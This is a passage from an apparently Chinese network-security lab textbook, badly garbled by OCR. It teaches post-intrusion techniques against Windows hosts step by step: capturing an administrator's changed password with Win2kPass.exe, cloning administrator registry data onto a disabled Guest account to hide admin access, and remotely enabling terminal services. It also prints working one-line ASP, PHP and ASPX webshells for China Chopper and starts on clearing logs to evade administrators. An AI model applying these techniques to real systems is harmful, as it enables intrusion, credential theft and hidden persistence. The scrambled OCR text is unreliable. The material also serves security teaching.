文件 名 的 文件 下 载 有 问题 ), 可 以 到 Winnt/temp 目录 下 查看 对 方 密码 修改 记录 文件 
(Config. ini) ,如 图 8-11 所 示 。 从 图 8-11 可 以 看 到 ,该 Web 服务 还 提供 文件 上 载 的 功能 ,可 


XO RRO FEV dux) IAD MB) 
emi- e- OAAR arr gas JD 3a- HXU 
HEO [la htp://192. 168. 1. 5:808 z) esa | 链接 


Bj HACKER 


QU:X Fired Bytes free: 2162M/4078M 
Æ: CDROM 


Network Neighborhood 


图 8-10 登录 到 Web 


160 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


以 上 载 本 地 文件 到 对 方 服务 器 的 任意 目录 。 


FÅ CAWINNT\ Temp) - Microsoft Internet Explorer 


XO RED FEV BRW 帮助 中) 


rR- o- OOA QL ems Qus i 3-3 
HEHE) [|] http://192. 168. 1. 5-608 /soRIvEs%ecywINNTITenpl 


Directory: C: WINNTATempN 


Date Time Size Filename 
10-18-2002 20:45 <DIR> aa 
10-18-2002 20:45 «n CL 
11-03-2003 01:12 <DIR> Qim. np, DIR\ 
11-27-2003 23:46 117 Quint 


11-27-2003 23:17 111 onfig.ini 


228 Bytes, 2 Files, 3 Folders 


Wpload File: || —— a] 


[^] 
fig] Fttpi1/172:18.25.109:808 'KORIVESSCI {WINNT Temoj Config ni [E [08 neret 元 


图 8-11 上 传 和 下 载 界面 


8.2.4 记录 管理 员 口 令 修 改过 程 


当 人 和 人 侵 到 对 方 主 机 并 得 到 管理 员 口 令 以 后 ,就 可 以 对 主机 进行 长 久 人 侵 了 ,但 是 一 个 好 
的 管理 员 一 般 每 隔 半 个 月 左右 就 会 修改 一 次 密码 ,这 样 已 经 得 到 的 密码 就 不 起 作用 了 。 

利用 工具 软件 Win2kPass. exe 记录 修改 的 新 密码 ,该 软件 将 密码 记录 在 Winnt\temp 
目录 下 的 Config. ini 文件 中 ,有 时 候 文件 名 可 能 不 是 Config, 但 是 扩展 名 一 定 是 ini, 该 工具 
软件 是 有 “自杀 ”功能 的 ,就 是 当 执 行 完 毕 后 ,自动 删除 自己 。 

步骤 1 在 对 方 操作 系统 中 执行 Win2KPass. exe 

首先 在 对 方 操作 系统 中 执行 Win2KPass. exe 文件 (利用 信任 连接 复制 即 可 ), 当 对 方 主 
机 管理 员 密 码 修改 并 重启 计算 机 以 后 ,就 在 Winnt\ temp 目录 下 产生 一 个 ini 文件 ,如 图 8-12 
所 示 。 


G NT\ Temp 
| ZEO 编辑 E) FEV KAO IAD HIW 

| AR- 5 -Gj| arr arr (me [O3 05 X A | Ed- 
iet [71 ciwi Temo 


XER x 
EC Driver Cache af 


CJ Fonts 
C3 Hep 
C3 115 Temporary Cc. 


修改 时 间 : 2003-11-28 7:17 
大 小 :111 宇 节 
属性 : (正常 ) 


1 
Best: 配置 设置 大 小 : 111 FP mys Gamta 


图 8-12 修改 密码 后 产生 的 ini 文件 
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步骤 2 查看 密码 
打开 该 文件 可 以 看 到 修改 后 的 新 密码 ,如 图 8-13 Bros ,具体 使 用 步骤 见 实 验 33. 


Aj Config.ini - 记事 本 oj xj 


密码 大 道 当前 版 本 2 -上 


2003-11-28 7:17:18 
当前 用 户 密码 : 


User-adninistrator; Pass-abcde; Domain=HACKER 


图 8-13 密码 内 容 


8.2.5 让 禁用 的 Guest 具有 管理 权限 


步骤 1 查看 对 方 主机 winlogon. exe 的 进程 号 

可 以 利用 工具 软件 psu. exe 得 到 该 键 值 的 查看 和 编辑 权 。 将 psu. exe 复制 到 对 方 主机 
的 C SET ,并 在 任务 管理 器 中 查看 对 方 主机 winlogon. exe 进程 的 ID 号 或 者 使 用 pulist. exe 
文件 查看 该 进程 的 ID 号 ,如 图 8-14 所 示 。 


G windows 任务 管理 器 gj x 
文件 (E) 选项 (o) FEV WB) 


services. exe 
lsass.exe 

svchost. exe 
svchost. exe 
spoolsv. exe 


conime. exe 
nsdtc. exe 

tepsves. exe 
svchost. exe 
llssrv. exe 


38888888888888 8ğ8832 


2o 
EFA 


EA: 35 [ceu E: 0% 内 存 使 用 : 91876K / 31086868K ^ 7) 
图 8-14 查看 winlogon 进程 号 


从 图 中 可 以 看 出 该 进程 号 为 192, 下 面 执 行 命令 “psu-p regedit-i pid”, 如 图 8-15 所 示 ， 
其 中 ,pid 为 Winlogon. exe 的 进程 号 。 


CAWINNT A System32|cmd.exe 


:Vpsu -p regedit -i 192 m 


8-315 ”执行 psu 命令 
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步骤 2 查看 SAM 键 值 


在 执行 psu 命令 的 时 候 必 须 将 注册 表 关 闭 ,执行 完 命 令 以 后 ,自动 打开 了 注册 表 编 辑 
器 ,查看 SAM 下 的 键 值 ,如 图 8-16 所 示 , 查 看 Administrator 和 guest 默认 的 键 值 , 从 图 中 
可 以 看 出 ,Administrator 一 般 为 0xlf4,guest 一 般 为 0xlf5 ,根据 “0xlf4” 和 “0xlf5” 找 到 


Administrator 和 guest 账户 的 配置 信息 ,如 图 8-17 所 示 。 
pu Lii 
日- 国 HKEY. LOCAL MACHINE 


(C HARDWARE 
日 生 sam 


数据 


E C3 san 
Eg Domains 
B- Account 
BA Aliases 
C3 Groups 
E Cg users 
(3 000001F4 
(3 ooooolF5 
Œ 000003E6 
Œ 000003E9 


(C HKEY, CURRENT. USER. 


E] 
日 - 久 HKEY_LOCAL_MACHINE 
E C] HARDWARE 


(长 度 为 地 的 二 进位 值 ) 


S i REG SZ 
REG BINARY 
B a CQ sen REG BINARY 
EH Cj Domains 
EC Account. 
BA Aliases 
E C3 Groups 
(£g 00000201 
E Names. 
BE users 
amma 
Œ 000001F5 


(数值 未 设置 ) 
02 00 01 00 00 00 00 00 46 fd bf d9 3e I! 
00 00 00 00 a8 00 00 00 02 00 01 00 a8 


图 8-17 账户 配置 信息 
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步骤 3 复制 Administrator 配置 信息 
在 图 8-18 右边 栏目 中 的 下 键 值 中 保存 了 账户 的 密码 信息 ,双击 000001F4 目录 下 键 值 
F, 可 以 看 到 该 键 值 的 二 进 制 信息 ,将 这 些 二 进 制 信息 全 选 ,并 复制 出 来 ,如 图 8-18 所 示 。 


= 上 区 


PES EZE] 


Sx 


E- HKEY_LOCAL_MACHINE 
数值 名 称 中 ; 


REE) 
01 00 00 00 00 00 46 fd bf do 3 
00 00 a8 00 00 00 02 000100 « 


图 8-18 5j Administrator 管理 员 配 置信 息 


步骤 4 覆盖 Guest 用 户 的 配置 信息 

将 复制 出 来 的 信息 全 部 覆盖 到 000001F5 目录 下 的 下 键 值 中 ,如 图 8-19 所 示 。 到 此 ， 
guest 可 以 登录 了 ,并 且 具 有 超级 用 户 权限 。 但 guest 在 计算 机 管理 的 用 户 中 显示 正常 (不 
禁用 ) ,而 我 们 要 它 显 式 禁 用 。 


EIRO mO aoe enm 7 < 


(数值 未 设置 ) 
02 00 01 00 00 00 00 00 00 00 00 00 C 
00 00 00 00 9c 00 00 00 02 00 01 00 9 


FROHEIBYHKEY LOCAL. MACHINElSAMISAM|DomainslAccountlUsers|O00001FS 
8-19 3 Guest 用 户 的 配置 信息 


步骤 5 导出 信息 

Guest 账户 已 经 具有 管理 员 权 限 了 。 为 了 能 够 使 Guest 账户 在 禁用 的 状态 登录 ,下 一 
步 将 Guest 账户 信息 导出 注册 表 。 选 择 User 目录 ,然后 选择 菜单 栏 “ 注 册 表 ”下 的 菜单 项 
“导出 注册 表 文 件 ”, 将 该 键 值 保存 为 一 个 配置 文件 ,如 图 8-20 所 示 。 

步骤 6 删除 Guest 账户 信息 

分 别 删除 Guest 和 00001F5 两 个 目录 ,如 图 8-21 所 示 。 
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Liri ll 


820 导出 键 值 


图 8-21 删除 Guest 账户 信息 


步骤 7 刷新 用 户 列表 
这 时 刷新 对 方 主机 的 用 户 列表 ,会 出 现 用 户 找 不 到 的 提示 ,如 图 8-22 所 示 。 


图 8-22 刷新 用 户 
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步骤 8 导入 信息 

将 上 面 导出 的 信息 文件 ,再 导入 注册 表 。 刷 新 用 户 列表 后 ,就 不 会 再 出 现 如 图 8-22 所 
示 的 对 话 框 了 。 

步骤 9 修改 Guest 账户 的 属性 

在 对 方 主机 的 命令 行 下 修改 Guest 的 用 户 属性 ,注意 : 一 定 要 在 命令 行 下 。 

首先 修改 Guest 账户 的 密码 , 改 成 “123456”, 并 将 Guest 账户 开启 和 停止 ,如 图 8-23 
所 示 。 


5. CAWINNTASystem32cmd.exe 


:pnet user guest 123456 
A 完成 。 


:NDnet user guest /active:yes 
pL user 


命令 成 功 完成 


: ?net user guest /active:no 


图 8-23 修改 guest 账户 的 属性 


步骤 10 查看 guest 账户 属性 
查看 一 下 计算 机 管理 窗口 中 的 Guest 账户 ,发 现 该 账户 是 禁用 的 ,如 图 8-24 所 示 。 


所 计算 机 管理 
| 操作 (&) 查看 W || e » | Gm | X sB] 9 


管理 计算 机 ( 域 ) 的 内 置 账户 
殿 来 宾 访 问 计 算 机 或 访问 域 的 内 


| 1AMHacker 1AMHacker 


IUSR_ADSER... Internet 来 宾 账号 匿名 访问 Internet 信息 服务 的 内 ,， 
IWAM_AD5E,,， 启动 15 进程 账号 启动 进程 之 外 的 应 用 程序 的 Inter, 
qingl0 qingl0 
520529 

I TsInternetuser TsInternetuser 这 个 用 尸 账 尸 被 终端 服务 所 使 用 。 


& C3 i8 

E fg ri 

Cg 磁盘 管理 
dy uimshmees 
运 辑 驱动 器 


LI 可 移动 存储 
| | | 


图 8-24 ”查看 guest 账户 的 属性 


步骤 11 利用 禁用 的 guest 账户 登录 
注销 退出 系统 ,然后 用 用 户 名 guest. 803 123456 登录 系统 ,如 图 8-25 所 示 。 
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ERA Windows 


Microsoft 


3m a Windows 
Pe My Windowszun 


RPS0: frest 
Seo: [eee 


取消 [omo 六 | 


8-25 用 guest 登录 


8.3 远程 终端 连接 


终端 服务 是 Windows 操作 系统 自 带 的 ,可 以 远程 通过 图 形 界面 操纵 服务 器 。 管 理 员 为 
了 远程 操作 方便 ,服务 器 上 的 该 服务 一 般 都 是 开启 的 。 在 默认 的 情况 下 终端 服务 是 启动 的 ， 
如 图 8-26 所 示 。 利 用 该 服务 ,使 用 命令 和 基于 浏览 器 方式 可 以 连接 到 对 方 主机 。 


| mto -————Q1[r FEES 


Ra Simple Mall Transport Protocol (SM... 页 ži LocalSystem 
b: Local5ystem 

Localsystem 

LocalSystem 

LocalSystem 

LocalSystem. 

Localystem. 

LocalSystem. 


Sy Windows Internet Name Service (... 
[Aia Windows Management Instrument... 
Sa Windows Management Instrument. 

a windows Time. 3 


图 8-26 终端 服务 


8.3.1 使 用 命令 连接 对 方 主机 


Windows 2000 和 Windows XP 自 带 的 终端 服务 连接 工具 都 是 mstsc. exe。 该 工具 中 
只 要 设置 要 连接 主机 的 TP 地 址 就 可 以 连接 ,如 图 8-27 所 示 。 

如 果 目 标 主机 的 终端 服务 是 启动 的 ,可 以 直接 登录 到 对 方 的 桌面 ,在 登录 框 中 输入 用 户 
名 和 密码 就 可 以 在 图 形 化 界面 中 操纵 对 方 主 机 了 .但 速度 要 慢 些 。 


8.3.2 ”Web 方式 远程 桌面 连接 


使 用 Web 方式 连接 ,该 工具 包含 几 个 文件 ,需要 将 这 些 文件 配置 到 IIS 的 站 点 中 去 , 程 
序列 表 如 图 8-28 所 示 。 具 体 使 用 步 又 见 实 验 34。 
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X 国 


bluebarh.gf 。 bluebarv.gf — connect.asp 


x a a 


win2000r.gf ^ defauk.htm msrdp.cab ~ win2000l.gif 


WAMO: [132.168.1.5 m 
用 户 名 : 无 指定 
Guns HRHSAUUI NER. 


Ean 


图 8-27 Windows XP 的 连接 界面 图 8-28 Web 连接 文件 目录 
将 这 些 文件 复制 到 本 地 TIS 默认 Web 站 点 的 根 目录 ,默认 目录 (c:\inetpub\wwwroot) 
下 ,如 图 8-29 所 示 ,注意 路 径 。 


*§ Internet 信息 服务 
mto mw ||e » om X rg [263 |i || B | o» won | 


cilinetpublscripts. 

ci\winntihelp\ishelp 
C:\WINNT\System32\inetsrv\jisadmin 
ci\inetpub\issamples 

c:\program files\common files\system\msadc 
C:\WINNT\web\printers 


B 默认 SMTP ERSS 
BÄ 默认 NNTP 虚拟 服务 器 


图 8-29 复制 到 IIS 默认 Web 站 点 


后 在 浏览 器 中 输入 “http://localhost” 打 开 连 接 程 序 ,如 图 8-30 所 示 。 在 服务 器 地 址 
文本 框 中 输入 对 方 的 TP 地 址 , 青 选择 连接 窗口 的 分 辨 率 , 单 击 “ 连 接 ” 按 钮 连接 到 对 方 的 桌 
面 ,如 图 8-31 所 示 。 

TTEA h Web 连接 - Microsoft Internet Explorer 
| 文件 (E) Ac) HEV BRA IAV MEO) 


PAR- s- 00A AR ue gae D awm- a 
[EBREO fÆ) hep:ynccahos 


Microsoft" 


Windows 
远程 桌面 Web 连接 


的 远程 计算 机 的 和 名称， 选择 连接 


键入 要 使 用 
MRED. MERTER. 
连接 页 打开 时 » IERIUUASICRTOR MGE 192. 168.1.5| 
机 的 连接 。 


简化 跟 同 一 台 计算 1 


: [poz s0 司 


T XGERTUERASEERIRE V 


En 


图 8-30 连接 终端 服务 
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FLEA MERA 172.18.25.109 - Microsoft Internet Explorer 
| xtHp Ep EEV IRD 帮助 四 


|emB-2-Qd|ast uem greo am- A 


JERO [& http: /hocahost/connact.asp?Server=192 168. 1.5 BrW=8008rH=6008 


ERA Windows 


基于 n 技术 构建 
o CO 
mo ph ———— 
L ws ] ma |o») 


8-31 在 浏览 器 下 的 登录 


8.3.3 用 命令 开启 对 方 的 终端 服务 


假设 对 方 没有 开启 终端 服务 ,用 上 面 的 方法 就 不 能 登录 了 ,可 以 使 用 软件 让 对 方 的 终端 


服务 开启 。 

使 用 工具 软件 djxyxs. exe, 可 以 给 对 方 安装 并 开启 该 服务 。 在 该 
工具 软件 中 已 经 包含 安装 终端 服务 所 需要 的 所 有 文件 ,该 文件 如 
图 8-32 所 示 , 具 体 使 用 步骤 见 实验 35。 

步骤 1 上 传 文件 到 指定 的 目录 

使 用 前 面 的 很 多 方法 (如 建立 信任 连接 ) 就 可 以 将 该 文件 上 传 并 
复制 到 对 方 服务 器 的 Winnt\temp 目录 下 (必须 放置 在 该 目录 下 ,和 否 
则 安装 不 成 功 ) ,如 图 8-33 所 示 。 


8-32 ”开启 终端 
服务 的 工 
具 软 件 


Pr CE 
Mies gard 6669 — 


mi 
C: WINNT\Temp 的 目录 
002-19-19 84:45 <DIR> 
002-19-19 84:45 <DIR> E 
9003-11-28 22:08 438 Config.ini 
0802-18-15 21:46 692,373 djxyxs.exe 
2 个 文件 697,811 
2 个 目录 1.980.903.424 ihres 
m 
图 8-33 文件 上 传 到 指定 的 目录 
步骤 2 执行 djxyxs. exe XAF 
执行 djxyxs. exe 文件 ,该 文件 会 自动 进行 解压 将 文件 全 部 放置 到 当前 的 目录 下 ,执行 
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命令 查看 当前 目录 下 的 文件 列表 ,生成 了 1 386 的 目录 ,这 个 目录 包含 安装 终端 服务 所 需要 
的 文件 。 最 后 执行 解压 出 来 的 azzd. exe 文件 ,将 自动 在 对 方 的 服务 器 上 安装 并 启动 终端 服 
务 , 就 可 以 用 前 面 的 方法 连接 终端 服务 器 了 ,如 图 8-34 所 示 。 


^ CAWINNT\System32\cmd.exe 


:\WINNT \Temp>djxyxs -exe 


;WINNT \Temnp>dir 


C: NIINNINIenp 的 目录 d 
8002-10-19 04:45 <DIR> 
pea2-16-19 04:45 <DIR> s5 
pee3s-11-28 22:00 438 Config.ini 
pea2-19-15 21:46 697,373 djxyxs -exe 
pea2-19-15 18:21 2,669 azzd.exe 
b001-12-31 15:45 28,672 cq.exe 
pag2-a9-18 17:21 62,952 sc.exe 
pea2-69-21 91:18 11,111 scuj.exe 
pea2-16-15 12:37 <DIR> 1386 
pau2-a9-20 16:02 29 mraz 
bau2-a9-24 03:52 294 azlj.dat 

s 个 文件 803,538 F 

3 个 目录 1.979.490.304 可 用 字 节 


图 8-34 安装 后 的 目录 列表 


8.4 木马 工具 的 使 用 


8.4.1 木马 定义 


“木马 ?与 计算 机 网 络 中 常常 要 用 到 的 远程 控制 软件 有 些 相似 ,但 由 于 远程 控制 软件 是 
“善意 ”的 控制 ,因此 通常 不 具有 隐蔽 性 ;“ 木 马 ? 则 完全 相反 ,木马 要 达到 的 是 “偷窃 性 的 远 
程控 制 ,如 果 没 有 很 强 的 隐蔽 性 , 那 就 是 “ 毫 无 价值 ?的 。 

它 是 指 通 过 一 段 特定 的 程序 (木马 程序 ) 来 控制 男 一 台 计 算 机 。 木 马 通常 有 两 个 可 执行 
程序 : 一 个 是 客户 端 , 即 控 制 端 ; 另 一 个 是 服务 端 , 即 被 控制 端 。 植 人 被 种 者 计算 机 的 是 
“服务 器 ”部 分 ,而 所 谓 的 “黑客 " 正 是 利用 “控制 器 "进入 运行 了 “服务 器 ”的 计算 机 。 运 行 了 
植 人 木马 程序 的 “服务 器 "以 后 ,被 种 者 的 计算 机 就 会 有 一 个 或 几 个 端口 被 打开 ,使 黑客 可 以 
利用 这 些 打 开 的 端口 进入 计算 机 系统 ,安全 和 个 人 隐私 也 就 全 无 保障 了 ! 木马 的 设计 者 为 
了 防止 木马 被 发 现 , 而 采用 多 种 手段 隐藏 木马 。 木 马 的 服务 一 旦 运行 并 被 控制 端 连接 ,其 控 
制 端 将 享有 服务 端的 大 部 分 操作 权限 ,例如 给 计算 机 增加 口令 ,浏览 移动 复制、 删除 文件 ， 
修改 注册 表 , 更 改 计算 机 配置 等 。 

随 着 病毒 编写 技术 的 发 展 ,木马 程序 对 用 户 的 威胁 越 来 越 大 ,尤其 是 一 些 木马 程序 采用 
了 极其 狭 独 的 手段 来 隐藏 自己 ,使 普通 用 户 很 难 在 中 毒 后 发 觉 。 


8.4.2 木马 原理 


一 个 完整 的 特洛伊 木马 套装 程序 包含 两 部 分 : 服务 端 (服务 器 部 分 ) 和 客户 端 (控制 器 
部 分 )。 植 入 对 方 计算 机 的 是 服务 端 ,而 黑客 正 是 利用 客户 端 进入 运行 了 服务 端的 计算 机 。 
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运行 了 植 入 木马 程序 的 服务 端 以 后 ,会 产生 一 个 有 着 容易 迷惑 用 户 的 名 称 的 进程 ,暗中 打开 
端口 ,向 指定 地 点 发 送 数据 (如 网 络 游戏 的 密码 ,即时 通信 软件 密码 和 用 户 上 网 密码 等 ) , 黑 
客 甚至 可 以 利用 这 些 打开 的 端口 进入 计算 机 系统 。 

特洛伊 木马 程序 不 会 自我 繁殖 ,也 不 会 “刻意 ”感染 其 他 文件 。 特 洛 伊 木 马 不 会 自动 运 
行 , 它 是 暗含 在 某 些 用 户 感 兴趣 的 文档 中 ,用 户 下 载 时 附带 的 。 当 用 户 运行 文档 程序 时 , 特 
洛 伊 木 马 才 会 运行 ,信息 或 文档 才 会 被 破坏 和 遗失 。 特 洛 伊 木马 和 后 门 不 一 样 , 后 门 指 隐 藏 
在 程序 中 的 秘密 功能 ,通常 是 程序 设计 者 为 了 能 在 日 后 随意 进入 系统 而 设置 的 。 

特洛伊 木马 有 两 种 :universal 和 transitive; universal 就 是 可 以 控制 的 ,而 transitive 
是 不 能 控制 , 写 死 的 操作 。 


8.4.3 木马 种 类 


1. 网 游 木马 

随 着 网 络 在 线 游戏 的 普及 和 升温 ,中 国 拥 有 规模 庞大 的 网 游玩 家 。 网 络 游戏 中 的 金钱 、 
装备 等 虚拟 财富 与 现实 财富 之 间 的 界限 越 来 越 模糊 。 与 此 同时 ,以 盗 取 网 游 账号 密码 为 目 
的 的 木马 病毒 也 随 之 发 展 泛滥 起 来 。 

网 络 游戏 木马 通常 采用 记录 用 户 键 盘 输 入 、Hook 游戏 进程 API 函数 等 方法 获取 用 户 
的 密码 和 账号 。 窃 取 到 的 信息 一 般 通过 发 送 电子 邮件 或 向 远程 脚本 程序 提交 的 方式 发 送 给 
木马 作者 。 

网 络 游戏 木马 的 种 类 和 数量 ,在 国产 木马 病毒 中 都 首屈一指 。 流 行 的 网 络 游戏 无 一 
不 受 网 游 木马 的 威胁 。 一 款 新 游戏 正式 发 布 后 ,往往 在 一 两 个 星期 内 ,就 会 有 相应 的 森 
马 程 序 被 制作 出 来 。 大 量 的 木马 生成 器 和 黑客 网 站 的 公开 销售 也 是 网 游 木马 泛滥 的 原 
因 之 一 。 

2. 网 银 木马 

网 银 木马 是 针对 网 上 交易 系统 编写 的 木马 病毒 ,其 目的 是 盗 取 用 户 的 卡号 、 密 码 , 甚 至 
安全 证 书 。 此 类 木马 种 类 数量 虽然 比 不 上 网 游 木马 ,但 它 的 危害 更 加 直接 ,受害 用 户 的 损失 
更 加 惨重 。 

网 银 木马 通常 针对 性 较 强 ,木马 作者 可 能 首先 对 某 银行 的 网 上 交易 系统 进行 仔细 分 析 ， 
然后 针对 安全 薄弱 环节 编写 病毒 程序 。2013 年 ,安全 软件 计算 机 管家 截获 网 银 木 马 最 新 变 
种 * 强 马 温 ”。 弦 马 温 病毒 能 够 毫 无 痕迹 地 修改 支付 界面 ,使 用 户 根本 无 法 察觉 。 通 过 不 良 
网 站 提供 假 QVOD 下 载 地 址 进行 广泛 传播 , 当 用 户 下 载 这 一 挂 马 播放 器 文件 安装 后 就 会 中 
木马 病毒 ,该 病毒 运行 后 即 开 始 监 视 用 户 网 络 交易 ,屏蔽 余额 支付 和 快捷 支付 ,强制 用 户 使 
用 网 银 , 并 借 机 算 改 订单 , 瓷 取 财 产 。 

随 着 中 国 网 上 交易 的 普及 ,受到 外 来 网 银 木马 威胁 的 用 户 也 在 不 断 增加 。 

3. 下 载 类 

这 种 木马 程序 的 体积 一 般 很 小 ,其 功能 是 从 网 络 上 下 载 其 他 病毒 程序 或 安装 广告 软件 。 
由 于 体积 很 小 ,下 载 类 木马 更 容易 传播 ,传播 速度 也 更 快 。 通 常 功能 强大 ,体积 也 很 大 的 后 
门类 病毒 ,如 * 灰 合子"“ 黑 洞 ?等 ,传播 时 都 单独 编写 一 个 小 巧 的 下 载 型 木马 ,用 户 中 毒 后 会 
把 后 门 主 程序 下 载 到 本 机 运行 。 
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4. 代理 类 

用 户 感染 代理 类 木马 后 ,会 在 本 机 开启 HTTP.SOCKS 等 代理 服务 功能 。 黑 客 把 受 感 
染 计 算 机 作为 跳板 ,以 被 感染 用 户 的 身份 进行 黑客 活动 ,达到 隐藏 自己 的 目的 。 

5. FTP 木马 

FTP 型 木马 打开 被 控制 计算 机 的 21 号 端口 (FTP 所 使 用 的 默认 端口 ) ,使 每 一 个 人 都 
可 以 用 一 个 FTP 客户 端 程序 来 不 用 密码 连接 到 受 控制 端 计算 机 ,并 且 可 以 进行 最 高 权限 的 
上 传 和 下 载 ,窃取 受害 者 的 机 密 文 件 。 新 FTP 木马 还 加 上 了 密码 功能 ,这 样 ,只 有 攻击 者 本 
人 才 知 道 正 确 的 密码 ,从 而 进入 对 方 计算 机 。 

6. 通信 软件 类 

国内 即时 通信 软件 百花 齐 放 。QQ 新浪 UC、 网 易 泡 泡 、 盛 大 圈 圈 …… 网 上 聊天 的 用 户 
群 十 分 庞大 。 常 见 的 即时 通信 类 木马 一 般 有 以 下 三 种 。 

1) 发 送 消 息 型 

通过 即时 通信 软件 自动 发 送 含有 恶意 网 址 的 消息 ,目的 在 于 让 收 到 消息 的 用 户 单 击 网 
址 中 毒 ,用 户 中 毒 后 又 会 向 更 多 好 友 发 送 病毒 消息 。 此 类 病毒 常用 技术 是 搜索 聊天 窗口 , 进 
而 控制 该 窗口 自动 发 送 文本 内 容 。 发 送 消 息 型 木马 常常 充当 网 游 木 马 的 广告 ,如 “武汉 男生 
2005” 木 马 , 可 以 通过 MSN、QQ、UC 等 多 种 聊天 软件 发 送 带 毒 网 址 ,其 主要 功能 是 盗 取 传 
奇 游戏 的 账号 和 密码 。 

2) 盗号 型 

主要 目标 在 于 即时 通信 软件 的 登录 账号 和 密码 。 工 作 原 理 和 网 游 木马 类 似 。 病 毒 作 者 
次 得 他 人 账号 后 ,可 能 偷 宇 聊 天 记录 等 隐私 内 容 , 在 各 种 通信 软件 内 向 好 友 发 送 不 良 信息 、 
广告 推销 等 语句 ,或 将 账号 卖 掉 赚 取 利润 。 

3) 传播 自身 型 

2005 4E4E- ] ," MSN 性 感 鸡 ” 等 通过 MSN 传播 的 蠕虫 泛滥 了 一 阵 之 后 ,MSN 推出 新 版 
本 ,禁止 用 户 传送 可 执行 文件 。2005 年 上 半年 “QQ 龟 ”" 和 “QQ 爱 虫 ”这 两 个 国产 病毒 通过 
QQ 聊天 软件 发 送 自身 进行 传播 ,感染 用 户 数量 极 大 ,在 江 民 公司 统计 的 2005 年 上 半年 十 
大 病毒 排行 榜 上 分 列 第 一 和 第 四 名 。 从 技术 角度 分 析 , 发 送 文 件 类 的 QQ 蠕虫 是 以 前 发 送 
消息 类 QQ 木马 的 进化 ,采用 的 基本 技术 都 是 搜寻 到 聊天 窗口 后 ,对 聊天 窗口 进行 控制 ,来 
达到 发 送 文件 或 消息 的 目的 ,只 不 过 发 送 文件 的 操作 比 发 送 消息 复杂 很 多 。 

7. 网 页 单 击 类 

网 页 单 击 类 木马 会 恶意 模拟 用 户 单 击 广告 等 动作 ,在 短 时 间 内 可 以 产生 数 以 万 计 的 点 
击 量 。 病 毒 作者 的 编写 目的 一 般 是 为 了 赚 取 高 额 的 广告 推广 费用 。 此 类 病毒 的 技术 简单 ， 
一 般 只 是 向 服务 器 发 送 HTTP GET 请 求 。 


8.4.4 木马 的 使 用 


一 台 计 算 机 一 旦 中 了 木马 ,就 变 成 了 一 台 倪 偶 机 , 对方 可 以 在 计算 机 上 上 传 下 载 文件 ， 
偷 帘 私 人 文件 , 偷 取 各 种 密码 及 口令 信息 等 。 中 了 木马 后 一 切 秘密 都 将 暴露 在 别人 面前 , 隐 
私 不 复 存在 。 最 常用 的 木马 工具 有 : 一 句 话 木 马 、 中 国 菜 刀 、 巴 西 烤肉 等 。 
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1. 一 句 话 木 马 

一 句 话 木 马 短小 精 悍 ,而且 功 能 强大 ,隐蔽 性 非常 好 ,在 入 侵 中 始终 扮演 着 强大 的 作用 。 
一 般 与 中 国 菜刀 结合 使 用 ,还 可 以 和 一 句 话 客户 端 结合 使 用 ,一 句 话 客户 端 一 般 是 HTML 
格式 。 

如 果 和 中 国 菜刀 结合 使 用 , 则 利用 中 国 菜刀 连接 一 句 话 木马 URL 页 面 。 

如 果 是 一 句 话 客户 端 结合 使 用 , 则 通过 浏览 器 打开 一 句 话 客户 端 ,将 一 句 话 木马 URL 
复制 到 页 面 上 使 用 即 可 。 

常用 的 一 句 话 木马 格式 一 般 分 为 asp 格式 ,php 格式 ,aspx 格式 和 jsp 格式 。 

常用 一 句 话 木马 如 下 。 

asp 一 句 话 木马 : 

< % execute(request("value")) %> 

php 一 句 话 木马 : 

<?php@eval( $ POST[value]);?» 

aspx 一 句 话 木马 : 

<% @ Page Language = "Jscript" %> 

< % eval(Request. Item[ "value" ]) %> 

其 中 ,value 代表 一 句 话 木马 密码 。 当 利用 中 国 菜刀 或 者 一 句 话 客 户 端 连 接 一 句 话 木 马 
URL 时 ,需要 提供 一 个 密码 ,这 个 密码 就 是 value, 可 以 根据 自己 需求 定义 这 个 密码 。 

2. 中 国 菜刀 

中 国 菜刀 ,不 是 切 菜 做 饭 的 道具 ,而 是 一 款 专 业 的 网 站 管理 软件 ,用 途 广泛 ,使 用 方便 ， 
小 巧 实用 。 支 持 动态 脚本 的 网 站 ,都 可 以 用 中 国 菜刀 来 进行 管理 。 主 要 功能 有 : 文件 管理 ， 
虚拟 终端 ,数据 库 管 理 ,界面 如 图 8-35 所 示 。 


ii ccc 2016/2/2 11:57 xxm 

di Customize 2016/2/2 11:57 xx 

[D cachetmp 2012/7/24 16:33 — TMP 文件 160 KB 
B) db 2012/7/24 19:44 ^ Microsoft Office... 172 KB 
目 readme 2011/11/16 13:32 ”文本 文档 10 KB 
Oten 2011/11/16 12:54 应 用 程序 216 KB 


图 8-35 ”中 国 菜刀 界面 功能 


需要 配合 一 句 话 木马 进行 使 用 。 
具体 使 用 步骤 参见 实验 36 和 实验 37。 


8.5 网 络 隐身 


如 果 想 要 隐身 ,不 被 对 方 的 管理 员 发 现 ,就 要 清除 系统 的 日 志 , 系 统 的 日 志文 件 是 一 些 
文件 系统 的 集合 ,依靠 建立 起 的 各 种 数据 的 日 志文 件 而 存在 。 日 志 对 于 系统 安全 的 作用 是 
显而易见 的 ,无 论 是 网 络 管理 员 还 是 黑客 都 非常 重视 日 志 , 一 个 有 经 验 的 管理 员 往 往 能 够 迅 
速 通过 日 志 了 解 到 系统 的 安全 性 能 ,而 一 个 聪明 的 黑客 会 在 入 侵 成 功 后 迅速 清除 掉 对 自己 
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不 利 的 日 志 。 
8.5.1 清除 日 志 的 三 种 方法 


Windows 系统 的 日 志文 件 有 应 用 程序 日 志 、 安 全 上 日志、 系统 日 志 等 ,它们 默认 的 地 址 为 
WinntNSystem32MogFiles 目录 下 。 当 然 有 的 管理 员 为 了 更 好 地 保存 系统 日 志文 件 ,往往 将 
这 些 日 志文 件 的 地 址 进行 重新 定位 ,其 中 在 EVENTLOG 下 面 有 很 多 子 表 , 在 里 面 可 查 到 
以 上 日 志 的 定位 目录 。 

如 果 用 户 想 要 清除 自己 系统 中 的 日 志文 件 , 首 先 需 要 用 管理 员 账 号 登录 Windows 系 
A ,接着 在 “控制 面板 ?中 进入 “管理 工具 ”, 再 双击 里 面 的 “事件 查看 器 ”。 然 后 选择 打开 需要 
清除 的 日 志文 件 , 比 如 用 户 想 清除 安全 日 志 , 可 以 右键 单 击 “安全 性 ”选项 ,在 弹出 的 菜单 中 
选择 “属性 ”命令 。 接 下 来 在 弹出 的 对 话 框 中 , 单 击 下 面 的 “清除 日 志 ” 按 钮 就 可 以 清除 了 ,但 
